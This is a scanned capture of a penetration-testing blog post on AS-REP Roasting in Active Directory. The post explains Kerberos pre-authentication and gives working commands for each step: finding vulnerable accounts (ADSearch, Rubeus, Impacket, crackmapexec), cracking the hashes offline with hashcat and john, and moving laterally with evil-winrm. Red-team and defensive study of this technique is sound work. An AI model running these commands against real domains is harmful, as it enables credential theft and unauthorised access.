pentestlab.blog
Open in
urlscan Pro
192.0.78.24
Public Scan
Submitted URL: https://www.cybersecurityinformer.com/edition/weekly-penetration-testing-artificial-intelligence-2024-02-17/?open-article-id=26462802&...
Effective URL: https://pentestlab.blog/2024/02/20/as-rep-roasting/
Submission: On February 26 via api from US — Scanned from US
Effective URL: https://pentestlab.blog/2024/02/20/as-rep-roasting/
Submission: On February 26 via api from US — Scanned from US
Form analysis 5 forms found in the DOM
POST https://pentestlab.blog/wp-comments-post.php
<form action="https://pentestlab.blog/wp-comments-post.php" method="post" id="commentform" class="comment-form" novalidate="">
<div id="comment-form__verbum" class="transparent"></div>
<div class="verbum-form-meta"><input type="hidden" name="comment_post_ID" value="32547" id="comment_post_ID">
<input type="hidden" name="comment_parent" id="comment_parent" value="0">
<input type="hidden" name="highlander_comment_nonce" id="highlander_comment_nonce" value="cd309d941f">
<input type="hidden" name="verbum_show_subscription_modal" value="">
</div>
<p style="display: none;"><input type="hidden" id="akismet_comment_nonce" name="akismet_comment_nonce" value="4d837ff0eb"></p>
<p style="display: none !important;" class="akismet-fields-container" data-prefix="ak_"><label>Δ<textarea name="ak_hp_textarea" cols="45" rows="8" maxlength="100"></textarea></label><input type="hidden" id="ak_js_1" name="ak_js"
value="1708956899243">
<script>
document.getElementById("ak_js_1").setAttribute("value", (new Date()).getTime());
</script>
</p>
</form>POST https://subscribe.wordpress.com
<form action="https://subscribe.wordpress.com" method="post" accept-charset="utf-8" data-blog="32637504" data-post_access_level="everybody" id="subscribe-blog">
<p>Enter your email address to follow this blog and receive notifications of new articles by email.</p>
<p id="subscribe-email">
<label id="subscribe-field-label" for="subscribe-field" class="screen-reader-text"> Email Address: </label>
<input type="email" name="email" style="width: 95%; padding: 1px 10px" placeholder="Email Address" value="" id="subscribe-field" required="">
</p>
<p id="subscribe-submit">
<input type="hidden" name="action" value="subscribe">
<input type="hidden" name="blog_id" value="32637504">
<input type="hidden" name="source" value="https://pentestlab.blog/2024/02/20/as-rep-roasting/">
<input type="hidden" name="sub-type" value="widget">
<input type="hidden" name="redirect_fragment" value="subscribe-blog">
<input type="hidden" id="_wpnonce" name="_wpnonce" value="cec25e7806"> <button type="submit" class="wp-block-button__link"> Follow </button>
</p>
</form>GET https://pentestlab.blog
<form method="get" class="search-form" action="https://pentestlab.blog" role="search">
<label>
<span class="screen-reader-text"></span>
<input type="search" class="search-field" name="s" placeholder="Enter keyword here" value="">
</label>
<button type="submit" class="search-button">
<i class="fa fa-search"></i><span class="screen-reader-text">Search</span>
</button>
</form>POST https://subscribe.wordpress.com
<form method="post" action="https://subscribe.wordpress.com" accept-charset="utf-8" style="display: none;">
<div class="actnbr-follow-count">Join 2,268 other subscribers</div>
<div>
<input type="email" name="email" placeholder="Enter your email address" class="actnbr-email-field" aria-label="Enter your email address">
</div>
<input type="hidden" name="action" value="subscribe">
<input type="hidden" name="blog_id" value="32637504">
<input type="hidden" name="source" value="https://pentestlab.blog/2024/02/20/as-rep-roasting/">
<input type="hidden" name="sub-type" value="actionbar-follow">
<input type="hidden" id="_wpnonce" name="_wpnonce" value="cec25e7806">
<div class="actnbr-button-wrap">
<button type="submit" value="Sign me up"> Sign me up </button>
</div>
</form><form id="jp-carousel-comment-form">
<label for="jp-carousel-comment-form-comment-field" class="screen-reader-text">Write a Comment...</label>
<textarea name="comment" class="jp-carousel-comment-form-field jp-carousel-comment-form-textarea" id="jp-carousel-comment-form-comment-field" placeholder="Write a Comment..."></textarea>
<div id="jp-carousel-comment-form-submit-and-info-wrapper">
<div id="jp-carousel-comment-form-commenting-as">
<fieldset>
<label for="jp-carousel-comment-form-email-field">Email (Required)</label>
<input type="text" name="email" class="jp-carousel-comment-form-field jp-carousel-comment-form-text-field" id="jp-carousel-comment-form-email-field">
</fieldset>
<fieldset>
<label for="jp-carousel-comment-form-author-field">Name (Required)</label>
<input type="text" name="author" class="jp-carousel-comment-form-field jp-carousel-comment-form-text-field" id="jp-carousel-comment-form-author-field">
</fieldset>
<fieldset>
<label for="jp-carousel-comment-form-url-field">Website</label>
<input type="text" name="url" class="jp-carousel-comment-form-field jp-carousel-comment-form-text-field" id="jp-carousel-comment-form-url-field">
</fieldset>
</div>
<input type="submit" name="submit" class="jp-carousel-comment-form-button" id="jp-carousel-comment-form-button-submit" value="Post Comment">
</div>
</form>Text Content
Skip to content
Penetration Testing Lab
Offensive Techniques & Methodologies
Menu
* Methodologies
* Red Teaming
* Persistence
* Resources
* Papers
* Web Application
* Presentations
* Defcon
* DerbyCon
* Tools
* Videos
* BSides
* Defcon
* DerbyCon
* Hack In Paris
* Contact
* About Us
Posted on February 20, 2024February 19, 2024
AS-REP ROASTING
by Administrator.In Credential Access.Leave a Comment on AS-REP Roasting
Active Directory users that have the Kerberos pre-authentication enabled and
require access to a resource initiate the Kerberos authentication process by
sending an Authentication Server Request (AS-REQ) message to the domain
controller. The timestamp on that message is encrypted with the hash of the
user’s password. The domain controller can decrypt the timestamp using its own
record of the user password hash and it will send back an Authentication
Response (AS-REP) that contains a TGT (Ticket Granting Ticket) issued by the Key
Distribution Center which will be utilized for any future access requests by the
user.
Any users in the domain that have the Kerberos pre-authentication disabled
enables red teams to request authentication data for any user in the Active
Directory enforcing the domain controller to return the AS-REP message which is
encrypted with the password hash of the user. Conducting offline cracking, the
password of the user can retrieved which could be used for lateral movement.
Even though by default the option Do not require Kerberos pre-authentication is
not enabled, some Active Directory accounts such as service accounts might have
that option enabled for compatibility reasons i.e. to allow specific
applications to work properly since some applications doesn’t support Kerberos
pre-authentication.
Specifically, the Kerberos pre-authentication requires the user to supply it’s
secret key which is derived from it’s password prior to any TGT issued by the
Key Distribution Center (KDC) as a verification. The ticket granting ticket is
sent to the user in the KRB_AS_REP message which also contains the session key.
When the Kerberos pre-authentication is disabled, a user in the network can skip
this verification and request TGT’s that will contain the session keys for
offline cracking.
Kerberos Pre-authentication
ENUMERATION
In order to be able to conduct the AS-REP Roasting technique the vulnerable
accounts needs to be enumerated. ADSearch is a tool that can perform LDAP
queries in order to enumerate active directory objects. The
sAMAccountType=805306368 will query only Active Directory users and not
computert accounts or groups. The
userAccountControl:1.2.840.113556.1.4.803:=4194304 defines the users that have
the setting Do not require Kerberos pre-authentication enabled.
dotnet inline-execute /home/kali/ADSearch.exe --search "(&(sAMAccountType=805306368)(userAccountControl:1.2.840.113556.1.4.803:=4194304))" --attributes cn,distinguishedname,samaccountname
AS-REP Roasting – ADSearch
It is also feasible to identify vulnerable to AS-REP roasting accounts from a
non-domain joined system using the Impacket module GetNPUsers.
impacket-GetNPUsers -dc-ip 10.0.0.1 -ts red.lab/peter:Password123
AS-REP Roasting – Impacket Authenticated
AS-REP
The technique of AS-REP Roast has been implemented in Rubeus tool with the flag
asreproast. Rubeus will identify all accounts in the domain that do not require
Kerberos pre-authentication and extract their AS-REP hashes.
dotnet inline-execute /home/kali/Rubeus.exe asreproast
AS-REP Roasting – Rubeus over C2
.\Rubeus.exe asreproast
AS-REP Roasting – Rubeus
It is also feasible to conduct the AS-REP Roasting technique from a non-domain
joined system and from unauthenticated perspective with the module GetNPUsers
from Impacket suite. Supplying a list of active directory usernames against the
domain controller will retrieve the Kerberos authentication response (AS-REP)
hashes of the vulnerable accounts.
impacket-GetNPUsers -no-pass -usersfile usernames.txt -dc-ip 10.0.0.1 red.lab/
AS-REP Roasting – Impacket No Pass
impacket-GetNPUsers -usersfile /home/kali/Desktop/usernames.txt -request -dc-ip 10.0.0.1 "red.lab/"
AS-REP Roasting – Impacket
Execution of the command below will perform the authentication in the domain
controller and will format the AS-REP hash so it could be used by john the
ripper.
impacket-GetNPUsers red.lab/peter:Password123 -request -format john | grep "$krb5asrep$"
AS-REP Roasting – Impacket John The Ripper Format
Alternatively, crackmapexec can also perform the AS-REP Roasting technique from
authenticated or unauthenticated context.
crackmapexec ldap -dc-ip 10.0.0.1 -u usernames.txt -p '' --asreproast asreproast.out
AS-REP Roasting – Crackmapexec Unauthenticated
crackmapexec ldap 10.0.0.1 -u 'peter' -p 'Password123' –asreproast ./hash.asrep
crackmapexec ldap -dc-ip 10.0.0.1 -u usernames.txt -p 'Password123' --asreproast asreproast.out
AS-REP Roasting – Crackmapexec
OFFLINE CRACKING
Once the hash has been retrieved it could be cracked using hashcat. Since the
hash is Kerberos 5 AS-REP etype 23 the associated hash mode for this type of
encryption is 18200. The attack mode 3 will conduct a mask type attack against a
given wordlist. Specifically, hashcat will attempt to crack the hash by trying
all characters from given charsets per position.
hashcat -m18200 '' -a 3 /usr/share/wordlists/rockyou.txt
AS-REP Roasting – Hashcat
If the password is not sufficiently strong, hashcat will crack the password.
AS-REP Roasting – Hashcat Password
Alternatively, john the ripper can be used to crack Kerberos 5 AS-REP hashes.
The hash can be written into a file called hash.asrep.
AS-REP Roasting – Hash
Executing the following command will attempt to crack the password hash.
john --wordlist=/usr/share/wordlists/rockyou.txt --format=krb5asrep /home/kali/hash.asrep
AS-REP Roasting – john the ripper
LATERAL MOVEMENT
If the account is elevated, the cracked password can be used to authenticate
with the target system using evil-winrm.
evil-winrm -u Administrator -p Password123 -i @10.0.0.1
AS-REP Roasting – Lateral Movement
REFERENCES
1. https://www.netexec.wiki/ldap-protocol/asreproast
2. https://www.thehacker.recipes/ad/movement/kerberos/asreproast
3. https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/as-rep-roasting-using-rubeus-and-hashcat
4. https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/asreproast
5. https://www.picussecurity.com/resource/blog/as-rep-roasting-attack-explained-mitre-attack-t1558.004
6. https://medium.com/@jbtechmaven/hacking-active-directory-with-as-rep-roasting-15ca0d9fae5c
7. https://dmcxblue.gitbook.io/red-team-notes-2-0/red-team-techniques/credential-access/t1558-steal-or-forge-kerberos-tickets/as-rep-roasting
RATE THIS:
i
Rate This
SHARE THIS:
* Twitter
* Facebook
* LinkedIn
* Reddit
* Tumblr
* WhatsApp
* Telegram
* Pinterest
* Pocket
* Email
*
Like Loading...
RELATED
Resource Based Constrained DelegationOctober 18, 2021In "Privilege Escalation"
Shadow CredentialsFebruary 7, 2022In "Domain Persistence"
Skeleton KeyApril 10, 2018In "Post Exploitation"
AS-REPAS-REP RoastingcrackmapexecCredential AccesshashcatImpacketRed TeamRubeus
LEAVE A COMMENT CANCEL REPLY
Δ
POST NAVIGATION
Previous Previous post: Persistence – Windows Setup Script
FOLLOW PENTEST LAB
Enter your email address to follow this blog and receive notifications of new
articles by email.
Email Address:
Follow
Join 2,570 other subscribers
0 Claps
SEARCH TOPIC
Search
RECENT POSTS
* AS-REP Roasting
* Persistence – Windows Setup Script
* Persistence – Disk Clean-up
* Domain Escalation – Backup Operator
* Lateral Movement – Visual Studio DTE
CATEGORIES
* Coding (10)
* Exploitation Techniques (19)
* External Submissions (3)
* General Lab Notes (22)
* Information Gathering (12)
* Infrastructure (2)
* Maintaining Access (4)
* Mobile Pentesting (7)
* Network Mapping (1)
* Post Exploitation (13)
* Red Team (128)
* Credential Access (4)
* Defense Evasion (22)
* Domain Escalation (6)
* Domain Persistence (4)
* Initial Access (1)
* Lateral Movement (3)
* Man-in-the-middle (1)
* Persistence (36)
* Privilege Escalation (17)
* Reviews (1)
* Social Engineering (11)
* Tools (7)
* VoIP (4)
* Web Application (14)
* Wireless (2)
PENTEST LABORATORIES DISCORD
* Discord
PEN TEST LAB STATS
* 7,238,018 hits
FACEBOOK PAGE
--------------------------------------------------------------------------------
Blog at WordPress.com.
* Methodologies
* Red Teaming
* Persistence
* Resources
* Papers
* Web Application
* Presentations
* Defcon
* DerbyCon
* Tools
* Videos
* BSides
* Defcon
* DerbyCon
* Hack In Paris
* Contact
* About Us
* Comment
* Reblog
* Subscribe Subscribed
* Penetration Testing Lab
Join 2,268 other subscribers
Sign me up
* Already have a WordPress.com account? Log in now.
* * Penetration Testing Lab
* Customize
* Subscribe Subscribed
* Sign up
* Log in
* Copy shortlink
* Report this content
* View post in Reader
* Manage subscriptions
* Collapse this bar
Loading Comments...
Write a Comment...
Email (Required) Name (Required) Website
%d
Notifications